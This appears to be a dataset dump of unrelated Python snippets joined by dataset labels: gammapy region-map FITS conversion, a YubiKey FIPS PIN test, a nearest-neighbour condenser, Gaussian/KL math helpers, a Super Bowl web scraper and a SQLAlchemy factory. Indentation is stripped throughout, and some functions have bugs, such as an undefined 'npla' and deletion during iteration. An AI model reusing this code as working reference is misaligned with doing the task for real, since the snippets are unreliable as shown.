"""Convert to `~astropy.io.fits.HDUList`.
Parameters
----------
format : {"gadf", "ogip", "ogip-sherpa", "ogip-arf", "ogip-arf-sherpa"}
Format specification
hdu : str
Name of the HDU with the map data, used for "gadf" format.
hdu_bands : str
Name or index of the HDU with the BANDS table, used for "gadf" format.
hdu_region : str
Name or index of the HDU with the region table.
Returns
-------
hdulist : `~astropy.fits.HDUList`
HDU list
"""
hdulist = fits.HDUList()
table = self.to_table(format=format)
if hdu_bands is None:
hdu_bands = f"{hdu.upper()}_BANDS"
if hdu_region is None:
hdu_region = f"{hdu.upper()}_REGION"
if format in ["ogip", "ogip-sherpa", "ogip-arf", "ogip-arf-sherpa"]:
hdulist.append(fits.BinTableHDU(table))
elif format == "gadf":
table.meta.update(self.geom.axes.to_header())
hdulist.append(fits.BinTableHDU(table, name=hdu))
else:
raise ValueError(f"Unsupported format '{format}'")
if format in ["ogip", "ogip-sherpa", "gadf"]:
hdulist_geom = self.geom.to_hdulist(format=format, hdu_bands=hdu_bands, hdu_region=hdu_region)
hdulist.extend(hdulist_geom[1:])
return hdulist
@classmethod
def from_table(cls, table, format="", colname=None):
"""Create region map from table
Parameters
----------
table : `~astropy.table.Table`
Table with input data
format : {"gadf-sed}
Format to use
colname : str
Column name to take the data from.
Returns
-------
region_map : `RegionNDMap`
Region map
"""
if format == "gadf-sed":
if colname is None:
raise ValueError(f"Column name required")
axes = MapAxes.from_table(table=table, format=format)
if colname == "stat_scan":
axes = axes
# TODO: this is not officially supported by GADF...
# replace by LabelledMapAxis
elif colname == "counts":
edges = np.arange(table[colname].shape[1] + 1) - 0.5
axis = MapAxis.from_edges(edges, name="dataset-idx")
axes = [axis, axes["energy"]]
else:
axes = [axes["energy"]]
data = table[colname].data
unit = table[colname].unit or ""
else:
raise ValueError(f"Format not supported {format}")
geom = RegionGeom.create(region=None, axes=axes)
return cls(geom=geom, data=data, unit=unit, meta=table.meta)
@classmethod
def from_hdulist(cls, hdulist, format="gadf", ogip_column=None, hdu=None, **kwargs):
"""Create from `~astropy.io.fits.HDUList`.
Parameters
----------
hdulist : `~astropy.io.fits.HDUList`
HDU list.
format : {"gadf", "ogip", "ogip-arf"}
Format specification
ogip_column : {"COUNTS", "QUALITY", "BACKSCAL"}
If format 'ogip' is chosen which table hdu column to read.
hdu : str
Name or index of the HDU with the map data.
Returns
-------
region_nd_map : `RegionNDMap`
Region map.
"""
defaults = {
"ogip": {"hdu": "SPECTRUM", "column": "COUNTS"},
"ogip-arf": {"hdu": "SPECRESP", "column": "SPECRESP"},
"gadf": {"hdu": "SKYMAP", "column": "DATA"},
}
if hdu is None:
hdu = defaults[format]["hdu"]
if ogip_column is None:
ogip_column = defaults[format]["column"]
geom = RegionGeom.from_hdulist(hdulist, format=format, hdu=hdu)
table = Table.read(hdulist[hdu])
quantity = table[ogip_column].quantity
if ogip_column == "QUALITY":
data, unit = np.logical_not(quantity.value.astype(bool)), ""
else:
data, unit = quantity.value, quantity.unit
return cls(geom=geom, data=data, meta=table.meta, unit=unit)
def _pad_spatial(self, *args, **kwargs):
raise NotImplementedError("Spatial padding is not supported by RegionNDMap")
def crop(self):
raise NotImplementedError("Crop is not supported by RegionNDMap")
def stack(self, other, weights=None, nan_to_num=True):
"""Stack other region map into map.
Parameters
----------
other : `RegionNDMap`
Other map to stack
weights : `RegionNDMap`
Array to be used as weights. The spatial geometry must be equivalent
to `other` and additional axes must be broadcastable.
nan_to_num: bool
Non-finite values are replaced by zero if True (default).
"""
data = other.quantity.to_value(self.unit).astype(self.data.dtype)
# TODO: re-think stacking of regions. Is making the union reasonable?
# self.geom.union(other.geom)
if nan_to_num:
data = data.copy()
data[~np.isfinite(data)] = 0
if weights is not None:
if not other.geom.to_image() == weights.geom.to_image():
raise ValueError("Incompatible geoms between map and weights")
data = data * weights.data
self.data += data
def to_table(self, format="gadf"):
"""Convert to `~astropy.table.Table`.
Data format specification: :ref:`gadf:ogip-pha`
Parameters
----------
format : {"gadf", "ogip", "ogip-arf", "ogip-arf-sherpa"}
Format specification
Returns
-------
table : `~astropy.table.Table`
Table
"""
data = np.nan_to_num(self.quantity[:, 0, 0])
if format == "ogip":
if len(self.geom.axes) > 1:
raise ValueError(f"Writing to format '{format}' only supports a "
f"single energy axis. Got {self.geom.axes.names}")
energy_axis = self.geom.axes[0]
energy_axis.assert_name("energy")
table = Table()
table["CHANNEL"] = np.arange(energy_axis.nbin, dtype=np.int16)
table["COUNTS"] = np.array(data, dtype=np.int32)
# see https://heasarc.gsfc.nasa.gov/docs/heasarc/ofwg/docs/spectra/ogip_92_007/node6.html
table.meta = {
"EXTNAME": "SPECTRUM",
"telescop": "unknown",
"instrume": "unknown",
"filter": "None",
"exposure": 0,
"corrfile": "",
"corrscal": "",
"ancrfile": "",
"hduclass": "OGIP",
"hduclas1": "SPECTRUM",
"hduvers": "1.2.1",
"poisserr": True,
"chantype": "PHA",
"detchans": energy_axis.nbin,
"quality": 0,
"backscal": 0,
"grouping": 0,
"areascal": 1,
}
elif format in ["ogip-arf", "ogip-arf-sherpa"]:
if len(self.geom.axes) > 1:
raise ValueError(f"Writing to format '{format}' only supports a "
f"single energy axis. Got {self.geom.axes.names}")
energy_axis = self.geom.axes[0]
table = energy_axis.to_table(format=format)
table.meta = {
"EXTNAME": "SPECRESP",
"telescop": "unknown",
"instrume": "unknown",
"filter": "None",
"hduclass": "OGIP",
"hduclas1": "RESPONSE",
"hduclas2": "SPECRESP",
"hduvers": "1.1.0"
}
if format == "ogip-arf-sherpa":
data = data.to("cm2")
table["SPECRESP"] = data
elif format == "gadf":
table = Table()
data = self.quantity.flatten()
table["CHANNEL"] = np.arange(len(data), dtype=np.int16)
table["DATA"] = data
else:
raise ValueError(f"Unsupported format: '{format}'")
meta = {k: self.meta.get(k, v) for k, v in table.meta.items()}
table.meta.update(meta)
return table
def get_spectrum(self, *args, **kwargs):
"""Return self"""
return self
def to_region_nd_map(self, *args, **kwargs):
return self
def cutout(self, *args, **kwargs):
"""Return self"""
return self
|
nilq/baby-python
|
python
|
from .shi import Shi
from .ni import Ni
from .mi import Mi
from .i import I
from ._diacritic import Ji
__all__ = [
"Shi",
"Ni",
"Mi",
"I",
"Ji",
]
|
nilq/baby-python
|
python
|
from fido2.ctap1 import ApduError
from yubikit.core import TRANSPORT
from yubikit.management import CAPABILITY
from yubikit.core.smartcard import SW
from ykman.fido import fips_change_pin, fips_verify_pin, fips_reset, is_in_fips_mode
from . import condition
import pytest
@pytest.fixture(autouse=True)
@condition.fips(True)
@condition.capability(CAPABILITY.U2F)
@condition.transport(TRANSPORT.USB)
def preconditions():
pass
class TestFipsU2fCommands:
def test_pin_commands(self, fido_connection):
# Assumes PIN is 012345 or not set at beginning of test
# Make sure PIN is 012345
try:
fips_verify_pin(fido_connection, "012345")
fips_change_pin(fido_connection, "012345", "012345")
except ApduError as e:
if e.code == SW.VERIFY_FAIL_NO_RETRY:
pytest.skip("PIN set to something other than 012345")
elif e.code == SW.AUTH_METHOD_BLOCKED:
pytest.skip("PIN blocked")
elif e.code == SW.COMMAND_NOT_ALLOWED:
fips_change_pin(fido_connection, None, "012345")
# Verify with correct PIN
fips_verify_pin(fido_connection, "012345")
# Change the PIN, verify, then change back
fips_change_pin(fido_connection, "012345", "012012")
fips_verify_pin(fido_connection, "012012")
fips_change_pin(fido_connection, "012012", "012345")
# Verify with incorrect PIN
with pytest.raises(ApduError) as ctx:
fips_verify_pin(fido_connection, "543210")
assert SW.VERIFY_FAIL_NO_RETRY == ctx.value.code
# Verify with correct PIN
fips_verify_pin(fido_connection, "012345")
def test_reset_command(self, fido_connection):
try:
fips_reset(fido_connection)
except ApduError as e:
assert e.code in [SW.COMMAND_NOT_ALLOWED, SW.CONDITIONS_NOT_SATISFIED]
def test_verify_fips_mode_command(self, fido_connection):
is_in_fips_mode(fido_connection)
|
nilq/baby-python
|
python
|
import random
from utils import cosine_distance
import numpy as np
class IterativeCondensedNN:
def __init__(self):
self.y_index = {}
def fit(self, X_train,y):
for idx, observation in enumerate(X_train):
self.y_index[observation.tostring()] = idx
samples = []
_random = random.randint(0, len(X_train) - 1)
samples.append(X_train[_random])
X_train = np.delete(X_train, _random, axis=0)
n_samples = len(samples)
while True:
# set initial distance high to always improve at the beginning
minSampleDistance = 99999
closestSample = None
closestClass = None
for idx, observation in enumerate(X_train):
# self.y_index[observation.tostring()] = idx
for sample in samples:
print(observation.shape, sample.shape)
sampleDistance = cosine_distance(observation, sample)
if sampleDistance < minSampleDistance:
minSampleDistance = sampleDistance
closestClass = y[self.y_index[sample.tostring()]]
if closestClass == y[self.y_index[observation.tostring()]]:
# both are the same class and keep the closest sample
continue
else: # different add to cleansed dataset
samples.append(X_train[idx])
X_train = np.delete(X_train, idx, axis=0)
if len(samples) == n_samples:
# no new samples on this pass, exit the while loop
break
# update the number of samples to check against the next run
n_samples = len(samples)
print("Number of samples selected: " + str(len(samples)))
return samples
|
nilq/baby-python
|
python
|
import autograd.numpy as np
from autograd.scipy.special import gammaln
def sigmoid(a):
return 1. / (1. + np.exp(-a))
def logit(a):
return np.log(a) - np.log(1-a)
def mvn_diag_logpdf(x, mean, log_std):
D = len(mean)
qterm = -.5 * np.sum((x - mean)**2 / np.exp(2.*log_std), axis=1)
coef = -.5*D * np.log(2.*np.pi) - np.sum(log_std)
return qterm + coef
def mvn_diag_logpdf_grad(x, mean, log_std):
pass
def mvn_diag_entropy(log_std):
D = len(log_std)
return .5 * (D*np.log(2*np.pi*np.e) + np.sum(2*log_std))
def mvn_logpdf(x, mean, icholSigma):
D = len(mean)
coef = -.5*D*np.log(2.*np.pi)
dterm = np.sum(np.log(np.diag(icholSigma)))
white = np.dot(np.atleast_2d(x) - mean, icholSigma.T)
qterm = -.5*np.sum(white**2, axis=1)
ll = coef + dterm + qterm
if len(ll) == 1:
return ll[0]
return ll
def mvn_fisher_info(params):
""" returns the fisher information matrix (diagonal) for a multivariate
normal distribution with params = [mu, ln sigma] """
D = len(params) / 2
mean, log_std = params[:D], params[D:]
return np.concatenate([np.exp(-2.*log_std),
2*np.ones(D)])
def kl_mvn(m0, S0, m1, S1):
"""KL divergence between two normal distributions - can
m0: N x
"""
# .5 log det (Sig1 Sig0^-1)
# + .5 tr( Sig1^-1 * ((mu_0 - mu_1)(mu_0 - mu_1)^T + Sig0 - Sig1) )
det_term = .5 * np.log(npla.det(npla.solve(S0, S1).T))
S1inv = npla.inv(S1)
diff = m0 - m1
outers = np.einsum("id,ie->ide", diff, diff) + S0 - S1
tr_term = .5 * np.einsum("de,ide->i", S1inv, outers)
return det_term + tr_term
def kl_mvn_diag(m0, S0, m1, S1):
"""
Kullback-Liebler divergence from Gaussian pm,pv to Gaussian qm,qv.
Also computes KL divergence from a single Gaussian pm,pv to a set
of Gaussians qm,qv.
Diagonal covariances are assumed. Divergence is expressed in nats.
- accepts stacks of means, but only one S0 and S1
From wikipedia
KL( (m0, S0) || (m1, S1))
= .5 * ( tr(S1^{-1} S0) + log |S1|/|S0| +
(m1 - m0)^T S1^{-1} (m1 - m0) - N )
"""
# store inv diag covariance of S1 and diff between means
N = m0.shape[1]
iS1 = 1./S1
diff = m1 - m0
# kl is made of three terms
tr_term = np.sum(iS1 * S0)
det_term = np.sum(np.log(S1)) - np.sum(np.log(S0))
quad_term = np.sum( (diff*diff) * iS1, axis=1)
return .5 * (tr_term + det_term + quad_term - N)
def gamma_lnpdf(x, shape, rate):
""" shape/rate formulation on wikipedia """
coef = shape * np.log(rate) - gammaln(shape)
dterm = (shape-1.) * np.log(x) - rate*x
return coef + dterm
def make_fixed_cov_mvn_logpdf(Sigma):
icholSigma = np.linalg.inv(np.linalg.cholesky(Sigma))
return lambda x, mean: mvn_logpdf(x, mean, icholSigma)
def unpack_params(params):
mean, log_std = np.split(params, 2)
return mean, log_std
def unconstrained_to_simplex(rhos):
rhosf = np.concatenate([rhos, [0.]])
pis = np.exp(rhosf) / np.sum(np.exp(rhosf))
return pis
def simplex_to_unconstrained(pis):
lnpis = np.log(pis)
return (lnpis - lnpis[-1])[:-1]
|
nilq/baby-python
|
python
|
from bs4 import BeautifulSoup
import urllib.request
import csv
web_page = urllib.request.urlopen('https://en.wikipedia.org/wiki/List_of_Super_Bowl_champions')
soup = BeautifulSoup(web_page, "html.parser")
super_bowl_table = soup.find_all('table', {'class': 'wikitable'})[1]
in_file = open("result.csv", 'w')
csv_writer = csv.writer(in_file, delimiter=',')
csv_writer.writerows([["Game number", "year", "winning team", "score", "losing team", "venue"]])
super_bowl_list = []
for row in super_bowl_table.find_all('tr')[1:51]:
cells = row.find_all('td')
super_bowl_list = [[cells[0].find('span', {'class': 'sorttext'}).get_text(), cells[1].find_all('span')[1].get_text().split()[2], cells[2].find('span', {'class': 'sortkey'}).get_text().replace(" !", ""), cells[3].find('span', {'class': 'sorttext'}).get_text(), cells[4].find('span', {'class': 'sortkey'}).get_text().replace(" !", ""), cells[5].find('span', {'class': 'sortkey'}).get_text().replace(" !", "")]]
csv_writer.writerows(super_bowl_list)
|
nilq/baby-python
|
python
|
import factory
from app.utils import db
from app.models.category import Category
from factories.department_factory import DepartmentFactory
class CategoryFactory(factory.alchemy.SQLAlchemyModelFactory):
class Meta:
model = Category
sqlalchemy_session = db.session
category_id = factory.Sequence(lambda n: n)
name = factory.Faker('name')
description = factory.Faker('sentence')
department_id = factory.Sequence(lambda n: n)
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.